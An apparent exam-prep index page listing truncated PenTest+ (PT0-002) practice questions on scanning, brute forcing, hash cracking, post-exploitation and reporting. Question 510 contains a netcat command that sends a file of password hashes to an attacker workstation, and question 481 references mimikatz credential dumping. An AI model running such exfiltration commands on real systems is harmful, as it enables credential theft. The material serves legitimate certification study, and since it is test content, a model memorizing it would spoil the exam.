PT0-002 Exam Questions
593 real PT0-002 exam questions with expert-verified answers and explanations. Page 10 of 12.
- Question #479Vulnerability discovery and analysis
An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?
MDMAndroid SecurityApplication SecurityRisk Identification - Question #480Reconnaissance and enumeration
A penetration tester is conducting an assessment on a web application. Which of the following active reconnaissance techniques would be best for the tester to use to gather additio...
active reconnaissanceweb application testinginterception proxyURI crawling - Question #481Post-exploitation and lateral movement
A penetration tester exploits a vulnerable service to gain a shell on a target server. The tester receives the following: Directory of C:\Users\Guest 05/13/2022 09:23 PM mimikatz.e...
MimikatzIndicators of CompromisePost-exploitationCredential dumping - Question #482Vulnerability discovery and analysis
During a penetration test of a server application, a security consultant found that the application randomly crashed or remained stable after opening several simultaneous connectio...
Application DebuggingVulnerability AnalysisPenetration Testing ToolsConcurrency Issues - Question #484Attacks and Exploits
While conducting a penetration test of a web application, the penetration tester enters the following URI: Which of the following attacks is the tester attempting?
Web Application SecurityDirectory TraversalPenetration TestingVulnerability Discovery - Question #485Post-exploitation and lateral movement
Given the following Bash code snippet: Which of the following would be achieved?
Bash scriptingFile downloadCommand-line utilitiesData transfer - Question #486Attacks and Exploits
While a penetration tester conducts a web application assessment, the following URL is accessed: Which of the following exploit types is being attempted?
SQL InjectionWeb Application AttacksExploitationVulnerability Identification - Question #487Information Gathering and Vulnerability Scanning
During a reconnaissance exercise, a penetration tester runs the following Nmap command: nmap -sT -sV -T2 -p 1-65535 domain.com After watching the scan run for more than two hours,...
NmapPort scanningScan optimizationTCP SYN scan - Question #488Information Gathering and Vulnerability Scanning
A penetration tester is scanning a customer subnet and wants to scan ports that are known to have only well-known UDP services present. Which of the following can the tester use to...
nmapUDP scanPort scanningWell-known ports - Question #489Attacks and Exploits
A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is b...
WAF bypassEvasion techniquesAPI securityCloud security - Question #490Attacks and Exploits
A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remember the use of the -t opt...
THC HydraBrute-force attackSSHPenetration testing tools - Question #491Attacks and Exploits
During a security assessment, a penetration tester decides to use the following Python snippet: Which of the following best describes what the penetration tester is trying to achie...
Denial of Service (DoS)Web Server AttacksPenetration Testing TechniquesPython Scripting - Question #492Engagement management
A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary?
Engagement documentationLessons learnedPenetration testing processProcess improvement - Question #493Tools and Code Analysis
While performing a mobile application penetration test, a security consultant notices that the user password is being locally encrypted before it is sent to the back end for authen...
Mobile application securityReverse engineeringEncryption analysisPenetration testing - Question #494Information Gathering and Vulnerability Scanning
A penetration tester wants to identify the most common TCP ports on 10.7.8.69. Which of the following is the best Nmap command for this task?
NmapPort ScanningTCP PortsEnumeration - Question #495Reconnaissance and enumeration
A penetration tester is gathering information and wants to retrieve hostnames and IP addresses. Which of the following should the tester do?
DNSInformation GatheringHost DiscoveryReconnaissance - Question #496Information Gathering and Vulnerability Scanning
A penetration tester needs to perform a vulnerability scan on a highly critical and fragile infrastructure system. Which of the following should the penetration tester do to minimi...
Vulnerability scanningRisk mitigationQuery throttlingFragile systems - Question #497Attacks and Exploits
A penetration tester discovers a login page during an assessment. Which of the following tools would the tester use to brute force a password?
Penetration testing toolsPassword brute-forceHydraWeb application attacks - Question #498Planning and Scoping
A penetration test is in the scoping phase of an engagement. Which of the following describes how a penetration tester would most effectively obtain the information necessary to be...
ScopingPre-engagementClient CommunicationEngagement Planning - Question #499Information Gathering and Vulnerability Scanning
A penetration tester would like to know if any web servers or mail servers are running on the in- scope network segment. Which of the following is the best to use in this scenario?
NmapService discoveryNetwork scanningInformation gathering - Question #500Information Gathering and Vulnerability Scanning
A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabiliti...
Vulnerability scanningPenetration testing toolsNessusDatabase security - Question #501Planning and Scoping
Which of the following legal concepts specifically outlines the scope, deliverables, and timelines of a project or engagement?
SOWProject documentationLegal conceptsEngagement planning - Question #502Post-exploitation and lateral movement
A client claims that a ransomware attack has crippled its corporate network following a penetration test assessment. Which of the following is the most likely root cause of this is...
Post-exploitation cleanupTester artifactsCredential managementPersistence - Question #503Reconnaissance and enumeration
A penetration tester runs an Nmap scan and obtains the following output: Which of the following should the penetration tester run next to explore this host further?
Active DirectoryEnumerationReconnaissancePenetration Testing Tools - Question #504Attacks and Exploits
A penetration tester is conducting a physical test against an organization. During the first day of the assessment, the tester follows an employee to the coffee shop next door. Whi...
Physical penetration testingRFID cloningBadge captureExploitation techniques - Question #505Reporting and Communication
Which of the following is a declaration from an independent third party that lends credibility to the part of the organization undergoing the review and is required as part of an a...
Audit terminologyAttestationReportingIndependent review - Question #506Post-exploitation and lateral movement
A penetration tester gained access to one of the target company's servers. During the enumeration phase, the penetration tester lists the bash history and observes the following ro...
Credential discoveryBash history analysisIMAPS exploitationPost-exploitation - Question #507Attacks and Exploits
A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the e...
Hash crackingPassword crackingHashcatMD5 - Question #509Post-exploitation and lateral movement
Which of the following best explains why a penetration tester would use ProxyChains during an assessment?
ProxyChainsLateral movementRemote accessNetworking tools - Question #510Post-exploitation and lateral movement
A penetration tester gets a shell on a server and runs the following command: nc kaliworkstation 4444 < hashes.txt The penetration tester runs the following command on a Kali works...
NetcatFile exfiltrationPost-exploitationData transfer - Question #511Reporting and Communication
In a standard engagement, a post-report document is provided outside of the report. This document: - Does not contain specific findings - Exposes vulnerabilities - Can be shared pu...
Executive summaryReportingCommunicationDeliverables - Question #512Information Gathering and Vulnerability Scanning
A penetration tester is configuring a vulnerability management solution to perform a scan of Linux servers on an enterprise network. The client wants to reduce potential disruption...
Vulnerability scanningLeast privilegeAccess controlScan configuration - Question #513Tools and Code Analysis
A penetration tester is troubleshooting the right value for the urls variable that should be used in the following script: Which of the following instructions in a Python script wi...
Python ScriptingData ManipulationDuplicate RemovalDictionary Comprehension - Question #514Reconnaissance and enumeration
While performing reconnaissance, a penetration tester runs Nmap and receives the following output: Nmap scan report for samplescan.org (44.33.55.66) Host is up (0.025s latency). No...
Traffic sniffingUnencrypted protocolsPort securityReconnaissance - Question #515Vulnerability discovery and analysis
During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet...
Secrets managementCredential exposureVulnerability remediationService account security - Question #516Vulnerability discovery and analysis
A penetration tester discovers that an organization's infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabi...
Cloud SecurityVirtualizationContainer OrchestrationPenetration Testing - Question #517Tools and Code Analysis
Given the following table: Which of the following data structures would most likely be used to store Known-good configurations of firewall rules in a Python script?
PythonData StructuresScriptingConfiguration Storage - Question #518Post-exploitation and lateral movement
A penetration tester is doing an assessment for a company that requires an external command- and-control server. The command-and-control tool should be able to use multiple types o...
Command and ControlPost-exploitationC2 FrameworksPayloads - Question #519Reconnaissance and enumeration
A penetration tester is gathering information about a target company for a penetration test in order to tailor the type of attacks. However, the tester is worried about sending pac...
Passive reconnaissanceInformation gatheringShodanOSINT - Question #520Attacks and Exploits
Which of the following is the most effective method for ensuring a payload or exploit will run regardless of the operating system version?
Static compilationPayload portabilityExploit reliability - Question #521Information Gathering and Vulnerability Scanning
A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabiliti...
SQL InjectionDatabase VulnerabilitiesPenetration Testing ToolsVulnerability Scanning - Question #522Attacks and Exploits
An employee received an email stating that a bank account was deactivated and will expire if the employee does not respond within the next 24 hours. Which of the following attacks...
PhishingSocial EngineeringEmail-based attacks - Question #523Information Gathering and Vulnerability Scanning
During a vulnerability management process that lasted several months, a security analyst found the number of vulnerabilities in a production web application consistently grew. Whic...
CI/CD securityApplication securityVulnerability scanningDevSecOps - Question #524Reporting and Communication
Which of the following types of communication should a penetration tester provide a client to document test results for PCI DSS compliance?
PCI DSS complianceReportingAttestationDocumentation - Question #525Reporting and Communication
Which of the following identifies a condensed, high-level discussion of findings during a penetration test reporting activity?
ReportingExecutive SummaryPenetration TestingReport Structure - Question #526Reconnaissance and enumeration
A penetration tester developed the following script: Which of the following best explains the purpose of this script?
DNS enumerationReconnaissanceHost mappingNetwork discovery - Question #527Reporting and Communication
During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the foll...
Wireless securityNetwork hardeningRemediationPhysical security - Question #528Reconnaissance and enumeration
Which of the following tools is commonly used for network scanning and enumeration during a penetration test?
Network scanningEnumerationPenetration testing toolsNmap - Question #529Engagement management
A client evaluating a penetration testing company requests examples of its work. Which of the following represents the best course of action for the penetration testers?
Client ConfidentialityProfessional EthicsEngagement ManagementReport Sharing Policy - Question #530Engagement management
Which of the following documents best ensures an external consulting firm that is hired to perform a penetration test understands and complies with the customer's security policies...
Rules of EngagementPenetration TestingComplianceSecurity Policies